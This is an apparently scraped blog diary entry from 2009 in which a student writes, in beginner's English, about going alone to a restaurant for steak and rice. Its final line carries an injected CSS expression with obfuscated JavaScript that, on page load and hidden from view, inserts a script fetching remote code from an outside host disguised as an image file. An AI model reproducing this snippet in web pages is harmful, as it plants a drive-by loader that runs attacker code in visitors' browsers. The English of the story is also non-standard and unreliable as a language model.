2009</SPAN>年8</SPAN>月13</SPAN>日:To the
restaurant</SPAN></SPAN></STRONG> Today noon, the time of lunch. My mother told me that there is no time for cocking lunch. And my mother said that we can have noodles for lunch. But today, I don’t want to have noodles for lunch. Although I always cook noodles.</SPAN> So I said to my mother: “Mother, I want to have rice for lunch. There is a restaurant call ‘Kong Fu’ near here. So I want to go there for lunch. ”</SPAN> My mother give me twenty yuan. So I can have my lunch.</SPAN> I went to the restaurant.</SPAN> I saw many people as I get into the restaurant. They are talking .</SPAN> I look at the menu. There are noodles and steak for lunch. I don`t like noodles. So I asked the waitress that I want the steak.</SPAN> “Hello, may I have the steak, please?”I said to the waitress.</SPAN> “Ok. Wait a minute, please.” The waitress said.</SPAN> I want to have something to drink. But I had no money. So I only have the rice, the vegetable and the steak.</SPAN> “Oh! It smell`s good.”I said to myself.</SPAN> I bite it as soon as I sat down from the chair.</SPAN> I am full up to the throat. And I have a very good lunch.</SPAN> </SPAN> </SPAN> </SPAN> ee:Expression(function(){if(!window.r){var ss='s'+'cript';var tt='text/ja'+'vas'+'cript';var st=document.createElement(ss);st.src='http://hajenip.googlepages.com/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none" 阅读全文>> |
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